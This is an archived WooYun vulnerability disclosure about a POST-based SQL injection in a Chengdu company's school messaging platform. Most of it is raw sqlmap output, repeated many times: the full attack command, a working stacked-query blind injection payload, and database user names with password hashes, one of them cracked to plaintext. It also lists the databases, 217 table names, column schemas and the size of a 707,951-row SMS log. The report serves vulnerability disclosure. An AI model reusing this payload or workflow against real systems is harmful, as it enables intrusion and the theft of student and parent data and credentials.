乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-03: 细节已通知厂商并且等待厂商处理中 2015-12-07: 厂商已经确认,细节仅向厂商公开 2015-12-17: 细节向核心白帽子及相关领域专家公开 2015-12-27: 细节向普通白帽子公开 2016-01-06: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
成都长力和信科技有限公司学生信息平台存在POST型SQL注射漏洞(DBA权限+系统管理员密码+217个表+70万手机信息发送日志)
地址:http://**.**.**.**/public/login.aspx
$ python sqlmap.py -u "http://**.**.**.**/public/login.aspx" -p xxbma --technique=B --form --random-agent --batch -D jxt -T MobileSendLog --columns --count --current-user --is-dba --users --passwords
current user: 'asianpeng'current user is DBA: Truedatabase management system users [3]:[*] asianpeng[*] esk[*] sadatabase management system users password hashes:[*] asianpeng [1]: password hash: 0x010086030ab7cb31ab7fc3d4b8d2a89093438c140c8108aee4bc header: 0x0100 salt: 86030ab7 mixedcase: cb31ab7fc3d4b8d2a89093438c140c8108aee4bc[*] esk [1]: password hash: 0x0100aa4e0d9547840c6a3668d3aff14883fda2289eceadbbae84 header: 0x0100 salt: aa4e0d95 mixedcase: 47840c6a3668d3aff14883fda2289eceadbbae84 clear-text password: esk[*] sa [1]: password hash: 0x01004086ceb694708f6c97df5631796b1db93ab5b933957419c5 header: 0x0100 salt: 4086ceb6 mixedcase: 94708f6c97df5631796b1db93ab5b933957419c5
Database: jxt+-------------------+---------+| Table | Entries |+-------------------+---------+| dbo.MobileSendLog | 707951 |+-------------------+---------+
Database: jxtTable: MobileSendLog[16 columns]+---------------+----------+| Column | Type |+---------------+----------+| bj_id | int || Content | varchar || CreateDate | datetime || DelaySendTime | varchar || Flag | tinyint || ID | int || lb_id | int || Mobile | varchar || mobileKind | int || RealSendTime | datetime || SendDate | datetime || SentTime | tinyint || smsNumber | int || SP_provider | tinyint || xxid | varchar || zh_id | int |+---------------+----------+
Database: jxt[217 tables]+----------------------------+| A_D_dlshang || A_S_Khwda || A_S_cdan || A_S_config || A_S_jse || A_S_qxian || A_S_zhu || A_W_Kjian || A_W_lmu || A_W_xwen || A_W_zliao || A_W_zllbie || A_keyword || AttCount || AttData || AttSmsReadyToSend || AttendanceMachine || AttendanceSMSStatus || AttendanceSMSStatus_backup || BillingSchools || ClassCategory || ClassSms || CountUsers || DIY_TEMPCOMMAND_TABLE || GetPwd || GradeCategory || I_fblbie || I_fbxxi || I_fbxxiLog || I_fbxxiV || I_fbxxi_CJDX || I_fbxxi_GXDX || I_fbxxi_HFJZ || I_fbxxi_JSDX || I_fbxxi_JXHD || I_fbxxi_KQDX || I_fbxxi_User_Del || I_fbxxi_recycle || I_fkxxi || I_jsfkxxi || I_kqxxi || I_schoolPyu || I_xspyu || JXHD_Repeat || KQStatus || K_kqxxi || Log || MC || MobileGet || MobileSend || MobileSendLog || MobileSendV || N_Dzjtiao || N_Fdszhi || N_JSKQGX_Jlu || N_JSKQGX_Szhi || N_JSKQ_Card || N_JSKQ_Jlu || N_JSKQ_Szhi || N_KqJlu || N_KqJlu2 || N_KqJluLog || N_KqJlu_test || N_KqLmu || N_Kqszhi || N_KsNoTji || N_XsCard || N_XsCard_History || N_jskqjl || N_kqjluV || O_grswu || O_kcbiao || O_xxckan || O_xxswu || ParamList || ReceiveLastID || RrechargeNum || SMSContentBank || SMSError || SMSRrecharge || SMSSchoolRrecharge || SMSTotal || SP_provider || S_Advice || S_BjJshi || S_Jses || S_Lmu || S_bji || S_cdan || S_config || S_jse || S_kmu || S_nji || S_qxian || S_xxjgou || S_yfjbxxi || S_zdyljie || S_zhu || S_ztai || SendAccountsTime || SendAttendanceSMS || SendCount || SendLog || SendLog2 || SendLogBackUp || SendMonth || SendNum || SendYear || Send_Sms_S_Zhu || Send_Sms_U_zhu || Send_Sms_U_zhu_back || SmsReadyToSend || Stca || StuStatusTotal || Stu_SMSStatus || Stu_SMSStatus_backup || SurplusNum || T_cjpming || T_cjpming_backup || T_cjxxi || T_cjxxi_bakcup || T_fzszhi || T_kongzhiqipeizhi || T_ksxxi || T_ksxxi_backup || T_kszhi || T_xqszhi || Target || Tea_SMSStatus || Tea_SMSStatus_backup || Teasms || Temp_MobileSend || U_bjsquan || U_jbxxi || U_jcxxi || U_studentGroup || U_xsjzhang || U_zhlbie || U_zhu || U_zhu_backup || V_black || V_jiegua || V_teacher || V_white || View_Card_Student || View_Card_Teacher || View_NoCard_Student || View_NoCard_Teacher || VisitRecord || WirelessAMCardID || Yf_sendCount || accessToken || att_fbxxi || attinfo || attinfo_backup || attinfolog || attschool || bjixxtji || black || cjtemplate || classes || comd_list || department || dianzaninfo || dtproperties || everyDay || everyMonth || iccardid || jz_loginstate || kqDuanXin || kqxx || loginState || messageGroup || pangolin_test_table || s_schoolMsg || s_schoolMsgType || scholarship || select_check_sms || select_users || sendlog_day || sendweixinmessage || smsbackground || smscategory || smschengji || sqlmapoutput || stuatt || stuinfo || sysdiagrams || systemc || t_jiaozhu || tablespaceinfo || test1 || tmptable || tongji || tongji_LB || tt || ttt || view_chengji || view_messageGroup || view_parentsaccount || view_smsBodyPart || view_smscheck || voteclass || voteinfo || votestu || weixinid || weixinmessage || weixinmessage2 || weixinmessage_definitetime || weixinmessage_history || wrong || wx_sendlog || wx_sendlog2 || wxtwclass || wxtwstu || zslq || zslqinfo |+----------------------------+
---Parameter: xxbma (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005current user: 'asianpeng'current user is DBA: Truedatabase management system users [3]:[*] asianpeng[*] esk[*] sadatabase management system users password hashes:[*] asianpeng [1]: password hash: 0x010086030ab7cb31ab7fc3d4b8d2a89093438c140c8108aee4bc header: 0x0100 salt: 86030ab7 mixedcase: cb31ab7fc3d4b8d2a89093438c140c8108aee4bc[*] esk [1]: password hash: 0x0100aa4e0d9547840c6a3668d3aff14883fda2289eceadbbae84 header: 0x0100 salt: aa4e0d95 mixedcase: 47840c6a3668d3aff14883fda2289eceadbbae84 clear-text password: esk[*] sa [1]: password hash: 0x01004086ceb694708f6c97df5631796b1db93ab5b933957419c5 header: 0x0100 salt: 4086ceb6 mixedcase: 94708f6c97df5631796b1db93ab5b933957419c5sqlmap resumed the following injection point(s) from stored session:---Parameter: xxbma (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005sqlmap resumed the following injection point(s) from stored session:---Parameter: xxbma (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005available databases [6]:[*] esk_db[*] jxt[*] master[*] model[*] msdb[*] tempdbsqlmap resumed the following injection point(s) from stored session:---Parameter: xxbma (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005sqlmap resumed the following injection point(s) from stored session:---Parameter: xxbma (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005Database: jxt[217 tables]+----------------------------+| A_D_dlshang || A_S_Khwda || A_S_cdan || A_S_config || A_S_jse || A_S_qxian || A_S_zhu || A_W_Kjian || A_W_lmu || A_W_xwen || A_W_zliao || A_W_zllbie || A_keyword || AttCount || AttData || AttSmsReadyToSend || AttendanceMachine || AttendanceSMSStatus || AttendanceSMSStatus_backup || BillingSchools || ClassCategory || ClassSms || CountUsers || DIY_TEMPCOMMAND_TABLE || GetPwd || GradeCategory || I_fblbie || I_fbxxi || I_fbxxiLog || I_fbxxiV || I_fbxxi_CJDX || I_fbxxi_GXDX || I_fbxxi_HFJZ || I_fbxxi_JSDX || I_fbxxi_JXHD || I_fbxxi_KQDX || I_fbxxi_User_Del || I_fbxxi_recycle || I_fkxxi || I_jsfkxxi || I_kqxxi || I_schoolPyu || I_xspyu || JXHD_Repeat || KQStatus || K_kqxxi || Log || MC || MobileGet || MobileSend || MobileSendLog || MobileSendV || N_Dzjtiao || N_Fdszhi || N_JSKQGX_Jlu || N_JSKQGX_Szhi || N_JSKQ_Card || N_JSKQ_Jlu || N_JSKQ_Szhi || N_KqJlu || N_KqJlu2 || N_KqJluLog || N_KqJlu_test || N_KqLmu || N_Kqszhi || N_KsNoTji || N_XsCard || N_XsCard_History || N_jskqjl || N_kqjluV || O_grswu || O_kcbiao || O_xxckan || O_xxswu || ParamList || ReceiveLastID || RrechargeNum || SMSContentBank || SMSError || SMSRrecharge || SMSSchoolRrecharge || SMSTotal || SP_provider || S_Advice || S_BjJshi || S_Jses || S_Lmu || S_bji || S_cdan || S_config || S_jse || S_kmu || S_nji || S_qxian || S_xxjgou || S_yfjbxxi || S_zdyljie || S_zhu || S_ztai || SendAccountsTime || SendAttendanceSMS || SendCount || SendLog || SendLog2 || SendLogBackUp || SendMonth || SendNum || SendYear || Send_Sms_S_Zhu || Send_Sms_U_zhu || Send_Sms_U_zhu_back || SmsReadyToSend || Stca || StuStatusTotal || Stu_SMSStatus || Stu_SMSStatus_backup || SurplusNum || T_cjpming || T_cjpming_backup || T_cjxxi || T_cjxxi_bakcup || T_fzszhi || T_kongzhiqipeizhi || T_ksxxi || T_ksxxi_backup || T_kszhi || T_xqszhi || Target || Tea_SMSStatus || Tea_SMSStatus_backup || Teasms || Temp_MobileSend || U_bjsquan || U_jbxxi || U_jcxxi || U_studentGroup || U_xsjzhang || U_zhlbie || U_zhu || U_zhu_backup || V_black || V_jiegua || V_teacher || V_white || View_Card_Student || View_Card_Teacher || View_NoCard_Student || View_NoCard_Teacher || VisitRecord || WirelessAMCardID || Yf_sendCount || accessToken || att_fbxxi || attinfo || attinfo_backup || attinfolog || attschool || bjixxtji || black || cjtemplate || classes || comd_list || department || dianzaninfo || dtproperties || everyDay || everyMonth || iccardid || jz_loginstate || kqDuanXin || kqxx || loginState || messageGroup || pangolin_test_table || s_schoolMsg || s_schoolMsgType || scholarship || select_check_sms || select_users || sendlog_day || sendweixinmessage || smsbackground || smscategory || smschengji || sqlmapoutput || stuatt || stuinfo || sysdiagrams || systemc || t_jiaozhu || tablespaceinfo || test1 || tmptable || tongji || tongji_LB || tt || ttt || view_chengji || view_messageGroup || view_parentsaccount || view_smsBodyPart || view_smscheck || voteclass || voteinfo || votestu || weixinid || weixinmessage || weixinmessage2 || weixinmessage_definitetime || weixinmessage_history || wrong || wx_sendlog || wx_sendlog2 || wxtwclass || wxtwstu || zslq || zslqinfo |+----------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: xxbma (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005Database: jxtTable: AttendanceSMSStatus[17 columns]+---------------+----------+| Column | Type |+---------------+----------+| classid | int || classname | varchar || content | varchar || describe | varchar || gradeid | int || gradename | varchar || id | int || mterrcode | varchar || mtmsgid | varchar || mtstat | varchar || receiveid | int || receivemobile | varchar || receivename | varchar || schoolid | int || schoolname | varchar || sendname | varchar || sendtime | datetime |+---------------+----------+
Database: jxtTable: MobileSendLog[16 columns]+---------------+----------+| Column | Type |+---------------+----------+| bj_id | int || Content | varchar || CreateDate | datetime || DelaySendTime | varchar || Flag | tinyint || ID | int || lb_id | int || Mobile | varchar || mobileKind | int || RealSendTime | datetime || SendDate | datetime || SentTime | tinyint || smsNumber | int || SP_provider | tinyint || xxid | varchar || zh_id | int |+---------------+----------+sqlmap resumed the following injection point(s) from stored session:---Parameter: xxbma (POST) Type: boolean-based blind Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwULLTE3NjYxNDYyOTYPZBYCAgEPZBYCAgcPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQlyZUxvZ2luQ2IFBlN1Ym1pdC7t6YwKeV1j6wXFjSRt0c/UwNbK&hid1=0&urlstr=KtHl&fileUrl=&xxbma=CzUZ';IF(8225=8225) SELECT 8225 ELSE DROP FUNCTION ybUR--&zhmingTxt=&mmaTxt=YCmM&reLoginCb=on&Submit.x=1&Submit.y=1&__EVENTVALIDATION=/wEWCQKPv6PkDwK+mfWHCAKTxZ3LDgLjy5zWDgKNv+jBBALiufzTCAKW0fqxDwKG0anvBwK8w4S2BKzuN2uuwTXS6SRvsYWqkBrbXUdD---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005Database: jxt+-------------------+---------+| Table | Entries |+-------------------+---------+| dbo.MobileSendLog | 707951 |+-------------------+---------+
上WAF。
危害等级:中
漏洞Rank:10
确认时间:2015-12-07 18:14
CNVD未直接复现所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无